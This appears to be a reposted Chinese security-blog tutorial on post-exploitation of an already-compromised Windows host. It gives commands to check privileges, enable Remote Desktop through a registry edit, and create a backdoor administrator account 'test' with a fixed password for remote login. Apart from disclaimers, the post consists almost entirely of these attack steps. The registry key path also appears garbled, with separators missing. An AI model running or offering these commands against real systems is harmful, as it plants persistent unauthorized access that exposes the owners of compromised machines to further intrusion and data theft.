声明
该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
前情提要
本次利用的前提是在已经渗透到目标系统,成功连接shell,并为windows系统且为高权限,未设置白名单只能本地连接。
内网渗透
查看当前用户权限,确认为高权限。
whoami
查看一下3389端口开放情况(下图的情况是3389端口已经开启了,没开启就没有回显。)
netstat -an | find "3389"
如果没有回显,可以使用如下命令开启3389端口。
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
顺便我这里给出关闭端口命令
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f
添加用户
net user test xiaochou /add # 添加账户密码
net localgroup administrators test /add # 给test账户添加为管理员权限
net user test # 查询是否成功添加test用户
这样使用账号:test,密码:xiaochou 登录远程桌面
原文始发于微信公众号(Devil安全):【内网渗透】Windows远程桌面利用
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论